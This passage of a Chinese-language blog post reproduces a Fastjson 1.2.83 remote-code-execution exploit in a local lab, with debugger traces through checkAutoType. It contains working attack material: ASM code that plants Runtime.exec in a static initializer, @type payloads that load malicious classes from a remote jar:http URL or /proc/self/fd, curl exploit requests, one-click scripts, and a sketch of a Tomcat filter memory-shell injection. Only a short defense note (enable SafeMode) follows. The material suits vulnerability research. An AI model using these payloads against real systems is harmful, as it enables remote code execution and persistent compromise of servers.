clinit.visitInsn(Opcodes.ICONST_2);</span><br><span class="line">    clinit.visitLdcInsn(cmd); clinit.visitInsn(Opcodes.AASTORE);</span><br><span class="line">    clinit.visitMethodInsn(Opcodes.INVOKEVIRTUAL, <span class="string">&quot;java/lang/Runtime&quot;</span>, <span class="string">&quot;exec&quot;</span>, <span class="string">&quot;([Ljava/lang/String;)Ljava/lang/Process;&quot;</span>, <span class="literal">false</span>);</span><br><span class="line">    clinit.visitInsn(Opcodes.POP);</span><br><span class="line">    clinit.visitInsn(Opcodes.RETURN);</span><br><span class="line">    clinit.visitMaxs(<span class="number">5</span>, <span class="number">0</span>);</span><br><span class="line">    clinit.visitEnd();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>配置调试：</p>
<blockquote>
<p>java -agentlib:jdwp&#x3D;transport&#x3D;dt_socket,server&#x3D;y,suspend&#x3D;y,address&#x3D;5005 -jar target&#x2F;fastjson-rce-env-1.0.0.jar</p>
</blockquote>
<p>IDEA 配置远程调试</p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-1.png" alt="image.png"></p>
<h3 id="java-1-8-调试"><a href="#java-1-8-调试" class="headerlink" title="java 1.8 调试"></a>java 1.8 调试</h3><p>构造：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash scripts/build.sh localhost <span class="number">19090</span> <span class="string">&quot;open -a Calculator&quot;</span> jdk8-http</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-2.png" alt="image.png"></p>
<p>一键攻击攻击：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 poc/exploit.py localhost <span class="number">19090</span> http:<span class="comment">//127.0.0.1:18080 /parse --mode jdk8-http --once</span></span><br></pre></td></tr></table></figure>

<p>直接在这里打断点</p>
<p>com.alibaba.fastjson.parser.ParserConfig#checkAutoType</p>
<p>typeName传进来的值就是请求恶意地址的值</p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-3.png" alt="image.png"></p>
<p>autoTypeCheckHandlers为空直接跳过，这个可以理解为用户允许某个 @type 能不能反序列化，默认没有设置就直接跳过来，如果设置有的话，后面所有 SafeMode &#x2F; 黑白名单 &#x2F; 内置安全校验全部跳过。然后走到safemode，没开的话，默认就是关的，然后就是黑白名单过滤了。</p>
<blockquote>
<p><strong>注意</strong>：safemode是在1.2.68中添加的，打开后就完全禁用autoype（即@type），这样就能防御fastjson反序列化了</p>
</blockquote>
<p>直接走到这，将类型名中的 . 替换为 &#x2F;，追加 .class 后缀，所以http:..localhost:19090.a—-》<a target="_blank" rel="noopener" href="http://localhost:19090/a.class">http://localhost:19090/a.class</a></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">String</span> <span class="variable">resource</span> <span class="operator">=</span> typeName.replace(<span class="string">&#x27;.&#x27;</span>, <span class="string">&#x27;/&#x27;</span>) + <span class="string">&quot;.class&quot;</span>;</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-4.png" alt="image.png"></p>
<p>然后走到这里，尝试用 ClassLoader 获取资源流，跟进getResourceAsStream</p>
<blockquote>
<p><strong>注意：</strong> getResourceAsStream 的类加载器要能识别 jar: 协议、把 jar:<a target="_blank" rel="noopener" href="http://.../">http:&#x2F;&#x2F;…</a> &#x2F; jar:file:&#x2F;proc&#x2F;self&#x2F;fd&#x2F;N! 真的当 URL 打开；同一个（或具备等价能力的）加载器 要能对读到的字节流调用 defineClass，<strong>Spring Boot fat-jar 的 LaunchedURLClassLoader 恰好同时满足这两点，所以</strong></p>
</blockquote>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">is = ParserConfig.class.getClassLoader().getResourceAsStream(resource);</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-5.png" alt="image.png"></p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-6.png" alt="image.png"></p>
<p>判断点在这里getResource，继续跟进getResource，双亲委派的方式，自上而下资源查找，如果资源存在就返回地址，</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> URL <span class="title function_">getResource</span><span class="params">(String name)</span> &#123;</span><br><span class="line">    URL url;</span><br><span class="line">    <span class="keyword">if</span> (parent != <span class="literal">null</span>) &#123;</span><br><span class="line">        url = parent.getResource(name);     <span class="comment">// 1. 委托父加载器</span></span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        url = getBootstrapResource(name);   <span class="comment">// 2. Bootstrap 加载器</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (url == <span class="literal">null</span>) &#123;</span><br><span class="line">        url = findResource(name);           <span class="comment">// 3. 自己找</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> url;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-7.png" alt="image.png"></p>
<p>然后回到java.net.URLClassLoader#getResourceAsStream，发起url连接，获取资源流，然后返回</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">URLConnection</span> <span class="variable">urlc</span> <span class="operator">=</span> url.openConnection(); <span class="comment">//发起连接的一步</span></span><br><span class="line">urlc.getInputStream();	<span class="comment">//读取数据</span></span><br></pre></td></tr></table></figure>

<p>JVM 会根据 URL 的协议，选择合适的 <code>URLStreamHandler</code>，于 JarURLConnection： 这一步会解析 JAR 文件结构，定位到 POC.class 的字节码，拿到了 POC.class</p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-8.png" alt="image.png"></p>
<p>用 ASM 扫描字节码中的 @JSONType 注解，检查POC.class 有 <code>@JSONType</code> 注解，又就返回true</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (is != <span class="literal">null</span>) &#123;</span><br><span class="line">    <span class="type">ClassReader</span> <span class="variable">classReader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ClassReader</span>(is, <span class="literal">true</span>);</span><br><span class="line">    <span class="type">TypeCollector</span> <span class="variable">visitor</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TypeCollector</span>(<span class="string">&quot;&lt;clinit&gt;&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[<span class="number">0</span>]);</span><br><span class="line">    classReader.accept(visitor);</span><br><span class="line">    jsonType = visitor.hasJsonType();          <span class="comment">// ★ 检查是否有 @JSONType</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-9.png" alt="image.png"></p>
<p>可以跟进hasJsonType看一下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="keyword">public</span> AnnotationVisitor <span class="title function_">visitAnnotation</span><span class="params">(String desc, <span class="type">boolean</span> visible)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="string">&quot;Lcom/alibaba/fastjson/annotation/JSONType;&quot;</span>.equals(desc)) &#123;</span><br><span class="line">        <span class="built_in">this</span>.jsonType = <span class="literal">true</span>;  </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">super</span>.visitAnnotation(desc, visible);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-10.png" alt="image.png"></p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-11.png" alt="image.png"></p>
<p>然后走完前面的，就到了这里，加载类，然后返回类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">clazz = TypeUtils.loadClass(typeName, defaultClassLoader, cacheClass);</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-12.png" alt="image.png"></p>
<p>返回类之后回到这里，继续往下走</p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-13.png" alt="image.png"></p>
<p>走到这里，跟进，里面触发newInstance()，动使用类，触发初始化</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">instance = TypeUtils.cast(object, clazz, <span class="built_in">this</span>.config);</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-14.png" alt="image.png"></p>
<p>最终走到newInstance()，然后初始化poc触发了静态方法</p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-15.png" alt="image.png"></p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-16.png" alt="image.png"></p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-17.png" alt="image.png"></p>
<h3 id="java17-调试"><a href="#java17-调试" class="headerlink" title="java17 调试"></a>java17 调试</h3><blockquote>
<p>JDK 9+ 模块化后，<code>http:</code> 协议不再被 <code>URLClassLoader.getResourceAsStream</code> 直接支持，但 <code>jar:http:</code> 仍然可以（先下载远程 jar，再从 jar 中提取资源）</p>
</blockquote>
<p>手打payload：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[</span><br><span class="line">  &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;jar:http:..3232252414:19090.probe!.foo.Exception&quot;</span>&#125;,</span><br><span class="line">  &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;jar:file:.proc.self.fd.3!.fd3.Exception&quot;</span>&#125;,</span><br><span class="line">  &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;jar:file:.proc.self.fd.4!.fd4.Exception&quot;</span>&#125;</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p>一键复现</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1. HTTP 托管恶意 JAR</span></span><br><span class="line"><span class="built_in">cd</span> poc/www &amp;&amp; python3 -m http.server 19090 &amp;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. 启动 JDK 17 靶场</span></span><br><span class="line">docker <span class="built_in">rm</span> -f fj-jdk17-rce 2&gt;/dev/null</span><br><span class="line">docker run -d --name fj-jdk17-rce \</span><br><span class="line">    --add-host host.docker.internal:host-gateway \</span><br><span class="line">    -p 18080:18080 -p 5005:5005 \</span><br><span class="line">    -v <span class="string">&quot;<span class="variable">$PWD</span>/target/fastjson-rce-env-1.0.0.jar:/app.jar:ro&quot;</span> \</span><br><span class="line">    eclipse-temurin:17-jre \</span><br><span class="line">    java <span class="string">&#x27;-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005&#x27;</span> \</span><br><span class="line">        -jar /app.jar</span><br><span class="line"></span><br><span class="line"><span class="comment"># 3. 等 5 秒后，一键 exploit</span></span><br><span class="line"><span class="built_in">sleep</span> 5 &amp;&amp; bash scripts/exploit-jdk17.sh</span><br></pre></td></tr></table></figure>

<p>或者分步手动打（看清楚每一步）：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Step 1: 下载恶意 JAR（触发 ClassLoader 缓存到 fd）</span></span><br><span class="line">curl -X POST -H <span class="string">&#x27;Content-Type: application/json&#x27;</span> \</span><br><span class="line">    -d <span class="string">&#x27;&#123;&quot;@type&quot;:&quot;jar:http:..3232252414:19090.probe_touch!.foo.E&quot;&#125;&#x27;</span> \</span><br><span class="line">    http://localhost:18080/parse</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 2: 查 fd 号</span></span><br><span class="line">docker <span class="built_in">exec</span> fj-jdk17-rce sh -c \</span><br><span class="line">    <span class="string">&#x27;ls -la /proc/1/fd/ | grep jar_cache&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 3: 用查到的 fd 号触发 RCE（假设 fd=14）</span></span><br><span class="line">curl -X POST -H <span class="string">&#x27;Content-Type: application/json&#x27;</span> \</span><br><span class="line">    -d <span class="string">&#x27;&#123;&quot;@type&quot;:&quot;jar:file:.proc.self.fd.15!.fd15.E&quot;&#125;&#x27;</span> \</span><br><span class="line">    http://localhost:18080/parse</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 4: 读取命令输出</span></span><br><span class="line">curl http://localhost:18080/rce</span><br></pre></td></tr></table></figure>

<h4 id="第一阶段：下载-jar，创建-fd-缓存"><a href="#第一阶段：下载-jar，创建-fd-缓存" class="headerlink" title="第一阶段：下载 jar，创建 fd 缓存"></a>第一阶段：下载 jar，创建 fd 缓存</h4><p>继续在com.alibaba.fastjson.parser.ParserConfig#checkAutoType打断点，第一阶段还是一样</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">typeName=jar:http:..localhost:<span class="number">19090.</span>probe!.foo.Exception</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-18.png" alt="image.png"></p>
<p>getRootJarFileFromUrl(url) 会下载远程 jar（<a target="_blank" rel="noopener" href="http://host:19090/probe">http://host:19090/probe</a>）到 &#x2F;tmp&#x2F;jar_cache*.tmp，打开该文件，然后删除磁盘文件但保持 fd 打开，当s 非 null &#x3D; JVM 成功下载了远程 jar 并从中读取了.class 的字节流。这一刻，”缓存”已经在 OS 层形成了。</p>
<p>Linux 的 &#x2F;proc 文件系统为每个进程维护了一个符号链接目录 &#x2F;proc&#x2F;self&#x2F;fd&#x2F;，其中每个条目指向该进程打开的文件描述符–即使文件已被从磁盘删除。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">is = ParserConfig.class.getClassLoader().getResourceAsStream(resource);</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-19.png" alt="image.png"></p>
<p>识别 <code>jar:</code> 协议并决定去哪里读数据”的地方。阶段一时，这里内部会发起 HTTP 请求下载 jar → <strong>这就是”缓存”形成的时刻</strong>。</p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-20.png" alt="image.png"></p>
<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-21.png" alt="image.png"></p>
<p>可以直接查看容器中的&#x2F;tmp目录，是有缓存</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"> % docker <span class="built_in">exec</span> fj-jdk17-rce sh -c \</span><br><span class="line">    <span class="string">&#x27;ls -la /proc/1/fd/ | grep jar_cache&#x27;</span></span><br><span class="line">lr-x------ 1 root root 64 Aug  3 03:27 15 -&gt; /tmp/jar_cache9866597154988054067.tmp (deleted)</span><br></pre></td></tr></table></figure>

<h4 id="阶段二：-从-fd-读取恶意类"><a href="#阶段二：-从-fd-读取恶意类" class="headerlink" title="阶段二： 从 fd 读取恶意类"></a>阶段二： 从 fd 读取恶意类</h4><p>前面流程都一样，走到这里加资源流。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">is = ParserConfig.class.getClassLoader().getResourceAsStream(resource);</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-22.png" alt="image.png"></p>
<p>跟前面一样，jsonType&#x3D;true 导致 TypeUtils.loadClass(typeName, …) 被调用，最终走到 defineClass</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (autoTypeSupport || jsonType || expectClassFlag) &#123;</span><br><span class="line">    boolean cacheClass = autoTypeSupport || jsonType;</span><br><span class="line">    clazz = TypeUtils.loadClass(typeName, defaultClassLoader, cacheClass);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-23.png" alt="image.png"></p>
<h3 id="java8和java17的区别："><a href="#java8和java17的区别：" class="headerlink" title="java8和java17的区别："></a>java8和java17的区别：</h3><p>真正的差异在 JVM Native 层（C++ 代码），ClassFileParser 解析类的内部名称时进行校验。</p>
<p>JDK 8 的 classFileParser.cpp 中 verify_unqualified_name 函数：</p>
<blockquote>
<p>规则：禁止类名中出现 [ 、 . 、 ; 等特殊字符</p>
<p>结果：&#x2F;&#x2F;（连续斜杠）不在禁止列表中</p>
<p>因此 JDK 8 直接接受类名 <a target="_blank" rel="noopener" href="http://1.2.3.4:19090/foo/Exception">http://1.2.3.4:19090/foo/Exception</a>，defineClass 成功。</p>
</blockquote>
<p>DK 9 重构了 class 文件解析器，加入了严格的类名校验：</p>
<blockquote>
<p>- 类名首字符不能是 &#x2F;</p>
<p>- 类名尾字符不能是 &#x2F;</p>
<p>- 类名中不能出现连续的 &#x2F;&#x2F;</p>
</blockquote>
<p>具体实现在 src&#x2F;hotspot&#x2F;share&#x2F;classfile&#x2F;classFileParser.cpp 的 verify_legal_class_name()函数中。</p>
<p>你需要用 ASM 字节码在 <code>&lt;clinit&gt;</code> 里写出等价于下面 Java 逻辑的代码（用 ASM 指令拼）：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">// 伪代码逻辑（实际要用 ASM 字节码指令写出）</span><br><span class="line">static &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">        // 1. 从线程上下文拿 Request 或遍历线程组找 catalina 线程</span><br><span class="line">        // 2. 反射链: Request -&gt; getContext() -&gt; StandardContext</span><br><span class="line">        // 3. 创建 FilterDef, setFilter(this), setFilterName(<span class="string">&quot;xxx&quot;</span>)</span><br><span class="line">        // 4. 创建 FilterMap, addURLPattern(<span class="string">&quot;/*&quot;</span>)</span><br><span class="line">        // 5. standardContext.addFilterDef(def)</span><br><span class="line">        // 6. standardContext.addFilterMap(map)</span><br><span class="line">    &#125; catch (Throwable t) &#123; /* 静默失败 */ &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="0x02-防御"><a href="#0x02-防御" class="headerlink" title="0x02 防御"></a>0x02 防御</h2><p><strong>1. 启用 SafeMode</strong></p>
<p>这样@type关键字就没有用了</p>
<h2 id="0x03-遇到的问题"><a href="#0x03-遇到的问题" class="headerlink" title="0x03 遇到的问题"></a>0x03 遇到的问题</h2><p>刚刚开始的时候我调试，我使用十进制的格式的payload，但是java.lang.ClassLoader#getResource走到返回url为null，资源不存在</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">JDK8 HTTP payload: &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;http:..2886994434:19090.a&quot;</span>&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-24.png" alt="image.png"></p>
